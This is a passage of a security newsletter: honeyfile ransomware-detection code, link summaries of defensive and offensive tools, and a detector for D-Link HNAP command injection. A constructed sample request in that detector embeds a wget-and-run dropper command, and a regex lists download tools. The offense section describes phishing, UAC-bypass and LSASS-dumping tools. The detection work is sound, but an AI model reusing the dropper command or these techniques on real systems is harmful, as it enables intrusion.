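# Namespace of Windows event XML (wevtutil /f:xml, Get-WinEvent ... .ToXml()).
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
HONEY_FOLDER = r"C:\Users\Public\Documents\honey"   # assumed trap location; must match the Sysmon rule


@dataclass
class HoneyHit:
    process_id: int
    image: str
    target_file: str
    utc_time: str


def _event_data(root: ET.Element) -> Dict[str, str]:
    """Flatten the <Data Name=...> children of <EventData> into a dict."""
    return {d.get("Name", ""): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}


def _under_honey_folder(path: str) -> bool:
    # NTFS paths are case-insensitive; require the separator so ...\honey2\x does not match.
    return path.lower().startswith(HONEY_FOLDER.lower() + "\\")


def parse_event(xml_text: str) -> Optional[HoneyHit]:
    """Return a HoneyHit for a Sysmon FileCreate (EventID 11) inside the honey folder, else None."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "11":
        return None
    data = _event_data(root)
    target = data.get("TargetFilename", "")
    if not _under_honey_folder(target):
        return None
    return HoneyHit(int(data["ProcessId"]), data.get("Image", ""), target, data.get("UtcTime", ""))


def dump_command(hit: HoneyHit, out_dir: str = r"C:\ir\dumps") -> List[str]:
    """Command the scheduled task would run: a full memory dump with Sysinternals procdump (assumed present)."""
    return ["procdump.exe", "-accepteula", "-ma", str(hit.process_id), f"{out_dir}\\pid{hit.process_id}.dmp"]


# Constructed events; raw strings because of the backslashes in Windows paths.
SAMPLE_HIT = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>11</EventID></System>
  <EventData>
    <Data Name="UtcTime">2022-09-10 08:15:42.117</Data>
    <Data Name="ProcessId">4812</Data>
    <Data Name="Image">C:\Users\alice\AppData\Local\Temp\crypt.exe</Data>
    <Data Name="TargetFilename">C:\Users\Public\Documents\honey\Q3-payroll.xlsx.locked</Data>
  </EventData>
</Event>"""

SAMPLE_BENIGN = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>11</EventID></System>
  <EventData>
    <Data Name="UtcTime">2022-09-10 08:16:01.004</Data>
    <Data Name="ProcessId">2200</Data>
    <Data Name="Image">C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE</Data>
    <Data Name="TargetFilename">C:\Users\alice\Documents\notes.docx</Data>
  </EventData>
</Event>"""

if __name__ == "__main__":
    for sample in (SAMPLE_HIT, SAMPLE_BENIGN):
        hit = parse_event(sample)
        print("no action" if hit is None else f"dump {hit.image} -> {' '.join(dump_command(hit))}")
```

Two practical points follow from the logic: scope the Sysmon FileCreate rule to the honey folder so EventID 11 volume stays tiny, and treat every FileCreate there as hostile, since nothing legitimate should write into a folder whose only purpose is to be touched by ransomware.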
How to centralize findings and automate deletion for unused AWS IAM roles
Hong Pham shares how to have good hygiene in AWS.
krie: Linux Kernel Runtime Integrity with eBPF
Guillaume Fournier provides some defence in depth / another hurdle for threat actors to consider when doing their thing on Linux.
KRIe is a research project that aims to detect Linux Kernel exploits with eBPF. KRIe is far from being a bulletproof strategy: from eBPF related limitations to post exploitation detections that might rely on a compromised kernel to emit security events, it is clear that a motivated attacker will eventually be able to bypass it. That being said, the goal of the project is to make attackers' lives harder and ultimately prevent out-of-the-box exploits from working on a vulnerable kernel.
https://github.com/Gui774ume/krie
Hardening Kitty
Michael Schneider, Travis McDade and ataumo provide a script which checks and hardens your Windows configuration.
https://github.com/scipag/HardeningKitty
uncover 0.0.7
With the latest version of Uncover, now easily search for exposed assets using multiple search engines at once.
Shodan
Censys
FOFA
Hunter
Quake
https://github.com/projectdiscovery/uncover/releases/tag/v0.0.7
Incident Response in AWS
Chris Farris provides a good overview of the real-world steps and differences.
https://www.chrisfarris.com/post/aws-ir/
Vulnerability
Our attack surface.
.NET: External Entity Injection during XML signature verification reachable via SAML
This is another epic vulnerability from Felix Wilhelm, with SAML again the attack surface. As with last week's, the root cause will pop up via various other attack surfaces also.
https://bugs.chromium.org/p/project-zero/issues/detail?id=2313
WordPress Core - Unauthenticated Blind SSRF
Simon Scannell and Thomas Chauchefoin document a vulnerability which will have a long tail of value in exploitation due to the size of the WordPress deployments out there. The impact of this will only be felt in the future.
https://blog.sonarsource.com/wordpress-core-unauthenticated-blind-ssrf/
Web pages can overwrite your system clipboard without your knowledge
Jeff Johnson documents this; the real impact could be fun if it were used to inject malicious documents (not tested).
https://lapcatsoftware.com/articles/clipboard.html
Offense
Attack capability, techniques and tradecraft.
EvilnoVNC: Ready to go Phishing Platform
We saw it offered as a service above; this is the on-premises version, from Joel GM.
Unlike other phishing techniques, EvilnoVNC allows 2FA bypassing by using a real browser over a noVNC connection. In addition, this tool allows us to see in real time all of the victim's actions, access to their downloaded files and more.
https://github.com/JoelGMSec/EvilnoVNC
Elevator: UAC Bypass by abusing RPC and debug objects
Kurosh Dabbagh Escalante provides some detection headaches with this capability.
This is done by abusing the behaviour of the RPC server that implements the UAC feature, as demonstrated by James Forshaw in his article Calling Local Windows RPC Servers from .NET. The tool does not require dropping an extra DLL etc.
https://github.com/Kudaes/Elevator
Avoiding Memory Scanners: Customizing Malware to Evade YARA, PE-sieve, and More
Kyle Avery walks through how to avoid various malware detection techniques.
https://blog.kyleavery.com/posts/avoiding-memory-scanners/
Defeating eBPF Uprobe Monitoring
Célian Glénaz just oozes quality with this post. Very useful defensive and offensive research here.
This article introduces a kind of eBPF program that may be used to monitor userspace programs. It first introduces you to eBPF and uprobes and then explores the flaws that we found in uprobes.
https://blog.quarkslab.com/defeating-ebpf-uprobe-monitoring.html
“GIFShell” — Covert Attack Chain and C2 Utilizing Microsoft Teams GIFs
Some vulnerabilities and some tradecraft combined to have fun.
Cobaltstrike Headless
HackOps (I just made that up) via Slack is now a thing
Aggressorscript that turns the headless aggressor client into a (mostly) functional cobalt strike client
https://github.com/CodeXTF2/cobaltstrike-headless
nanodump Updated
Will subvert some detection techniques relied on by blue teams.
add --duplicate-local technique: this allows nanodump to open a handle to LSASS with PROCESS_QUERY_LIMITED_INFORMATION and elevate the handle later. This way, we might bypass several detections.
https://github.com/helpsystems/nanodump/commit/0c2918e525ab89442d06804fdc6dee14ed17af2f
Exploitation
What is being exploited.
Mirai Variant MooBot Targeting D-Link Devices
Chao Lei, Zhibin Zhang, Cecilia Hu and Aveek Das show in-the-wild exploitation of various devices to build a botnet.
The vulnerabilities exploited include:
CVE-2015-2051: D-Link HNAP SOAPAction Header Command Execution Vulnerability
CVE-2018-6530: D-Link SOAP Interface Remote Code Execution Vulnerability
CVE-2022-26258: D-Link Remote Command Execution Vulnerability
CVE-2022-28958: D-Link Remote Command Execution Vulnerability
https://unit42.paloaltonetworks.com/moobot-d-link-devices/
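An added detection example (mine, not Unit 42 code) for the HNAP vector in that list: CVE-2015-2051 is command injection through the SOAPAction header of the HNAP1 endpoint, and Mirai-family droppers follow it with a fetch-and-run command. The classifier below flags shell metacharacters in a SOAPAction URI on /HNAP1 and downloader commands pointing at a URL or IP anywhere in the request; it does not cover the other three CVEs. The three HTTP requests are constructed, and the addresses are documentation ranges, not real infrastructure.

```python
"""Flag HNAP SOAPAction command injection and Mirai-style dropper commands in raw
HTTP requests (e.g. from a honeypot or WAF capture). Added example for this
newsletter, not Unit 42 tooling; the sample requests are constructed and the
192.0.2.x / 198.51.100.x addresses are documentation space."""
import re

# Shell metacharacters that have no place inside a SOAPAction URI.
SHELL_META = re.compile(r"[;`|&]|\$\(")
# A fetch tool followed, on the same line, by a URL or dotted-quad: matches a
# dropper one-liner but not prose that merely mentions "curl".
DROPPER = re.compile(
    r"\b(?:wget|curl|tftp|ftpget)\b[^\r\n]{0,80}?(?:https?://|ftp://|\d{1,3}(?:\.\d{1,3}){3})",
    re.IGNORECASE)


def parse_request(raw):
    """Minimal HTTP/1.1 request parser returning (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def classify(raw):
    """Return detection tags for one raw request; an empty list means clean."""
    _method, path, headers, body = parse_request(raw)
    tags = []
    soapaction = headers.get("soapaction", "").strip('"')
    if path.startswith("/HNAP1") and SHELL_META.search(soapaction):
        tags.append("hnap-soapaction-injection")
    if DROPPER.search(soapaction) or DROPPER.search(body):
        tags.append("dropper-command")
    return tags


# Constructed samples: a legitimate HNAP call, an injection attempt carrying a
# dropper, and an unrelated request whose body only mentions a tool name.
BENIGN = ("POST /HNAP1/ HTTP/1.1\r\nHost: 192.0.2.1\r\n"
          "SOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings\"\r\n"
          "Content-Type: text/xml\r\n\r\n<soap:Envelope/>")
INJECTED = ("POST /HNAP1/ HTTP/1.1\r\nHost: 192.0.2.1\r\n"
            "SOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings/"
            "`cd /tmp; wget http://198.51.100.7/bins.sh; sh bins.sh`\"\r\n"
            "Content-Type: text/xml\r\n\r\n<soap:Envelope/>")
UNRELATED = ("POST /api/notes HTTP/1.1\r\nHost: 192.0.2.1\r\n"
             "Content-Type: text/plain\r\n\r\nremember to install curl on the jump host")


def scan(requests):
    """Map request index to its tags, keeping only hits."""
    return {i: t for i, r in enumerate(requests) if (t := classify(r))}
```

Both rules are heuristics: a vendor's own HNAP client never puts metacharacters in SOAPAction, so the first rule is close to zero-noise on device traffic, while the dropper rule is only as good as the URL/IP requirement and should be tuned against your own logs.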
WDAC driver blocklist from Microsoft has been updated to v10.0.25180.0
Florian Stosse dumps the latest diff, from which we can infer, among other things, that the IOBit Unlock driver is being exploited in the wild.
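An added example (mine, not Florian Stosse's tooling) of how to produce that kind of diff yourself: WDAC policies are SiPolicy XML, and the recommended driver block rules express each blocked driver as a Deny rule on a file name (with MinimumFileVersion 65535.65535.65535.65535 meaning every version) or on a hash. Rule IDs are renumbered between releases, so the diff has to key on rule content, not ID. The two policy snippets are constructed with placeholder driver names, hashes and an invented earlier version number; only the Deny rules under FileRules are compared, not signer-based rules.

```python
"""Diff two WDAC driver-blocklist policies by rule content rather than rule ID.
Added example, not Florian Stosse's tooling. The two SiPolicy snippets are
constructed (placeholder driver names, hashes and an invented old version) in the
layout Microsoft's recommended driver block rules use, so the same functions can
be pointed at two real policy XML files."""
import xml.etree.ElementTree as ET

NS = {"sp": "urn:schemas-microsoft-com:sipolicy"}


def policy_version(policy_xml):
    """VersionEx is the policy's own version string (e.g. 10.0.25180.0)."""
    return ET.fromstring(policy_xml).findtext("sp:VersionEx", namespaces=NS)


def deny_rules(policy_xml):
    """Map each <Deny> under <FileRules> to a content key -> FriendlyName.
    IDs are regenerated between releases, so key on FileName+MinimumFileVersion
    or on the (case-normalised) Hash, which is what makes a diff meaningful."""
    rules = {}
    for deny in ET.fromstring(policy_xml).iterfind(".//sp:FileRules/sp:Deny", NS):
        a = deny.attrib
        if "Hash" in a:
            key = ("hash", a["Hash"].lower())
        else:
            key = ("file", a.get("FileName", "").lower(), a.get("MinimumFileVersion", ""))
        rules[key] = a.get("FriendlyName", a.get("ID", "?"))
    return rules


def diff_blocklists(old_xml, new_xml):
    """Return (added, removed) as sorted [(key, friendly_name)] lists."""
    old, new = deny_rules(old_xml), deny_rules(new_xml)
    added = sorted((k, new[k]) for k in new.keys() - old.keys())
    removed = sorted((k, old[k]) for k in old.keys() - new.keys())
    return added, removed


# Constructed sample policies: IDs renumbered and hash case changed between the
# two, with one genuinely new file-name rule in the newer policy.
OLD_POLICY = """<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy" PolicyType="Base Policy">
  <VersionEx>10.0.25160.0</VersionEx>
  <FileRules>
    <Deny ID="ID_DENY_D_1" FriendlyName="Contoso filter driver" FileName="contosoflt.sys"
          MinimumFileVersion="65535.65535.65535.65535" />
    <Deny ID="ID_DENY_D_2" FriendlyName="Fabrikam driver by hash" Hash="0A1B2C3D4E5F" />
  </FileRules>
</SiPolicy>"""

NEW_POLICY = """<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy" PolicyType="Base Policy">
  <VersionEx>10.0.25180.0</VersionEx>
  <FileRules>
    <Deny ID="ID_DENY_D_7" FriendlyName="Contoso filter driver" FileName="contosoflt.sys"
          MinimumFileVersion="65535.65535.65535.65535" />
    <Deny ID="ID_DENY_D_8" FriendlyName="Fabrikam driver by hash" Hash="0a1b2c3d4e5f" />
    <Deny ID="ID_DENY_D_9" FriendlyName="Example unlocker driver" FileName="exampleunlock.sys"
          MinimumFileVersion="65535.65535.65535.65535" />
  </FileRules>
</SiPolicy>"""


if __name__ == "__main__":
    added, removed = diff_blocklists(OLD_POLICY, NEW_POLICY)
    print(policy_version(OLD_POLICY), "->", policy_version(NEW_POLICY))
    for key, name in added:
        print("+", name, key)
    for key, name in removed:
        print("-", name, key)
```

A naive text diff of two releases lights up every renumbered ID and re-cased hash; keying on content, as above, leaves only the rules that actually changed, which is the list worth reading for hints about what is being abused in the wild.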
Tooling and Techniques
Low level tooling for attack and defence researchers.
SiliFuzz - Fuzzing CPUs by proxy
Kostya Serebryany et al release a tool chain which I suspect will unearth some interesting latent issues in both real CPUs and hypervisors.
SiliFuzz is a system that finds CPU defects by fuzzing software proxies, like CPU simulators or disassemblers, and then executing the accumulated test inputs (known as the corpus) on actual CPUs on a large scale.
https://github.com/google/silifuzz
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
Monthly Threat Actor Group Intelligence Report, July 2022, Korean - released late August
Crimeware Trends | Ransomware Developers Turn to Intermittent Encryption to Evade Detection
Basic Authentication Deprecation in Exchange Online – September 2022 Update
Northwestern Polytechnical University was allegedly attacked by the US - what looks, on the face of it, like an information operation built on some old artefacts
China adopting western style disclosure/logos for threat groups - this list includes alleged western actors
European Cybersecurity in Context A Policy-Oriented Comparative Analysis
JSAC2023 - Tokyo, January 25-26, 2023 - Call for Papers
The Sydney Dialogue - summit for emerging, critical, cyber & space technologies - Sydney on 4 & 5 April 2023.
That’s all folks.. until next week..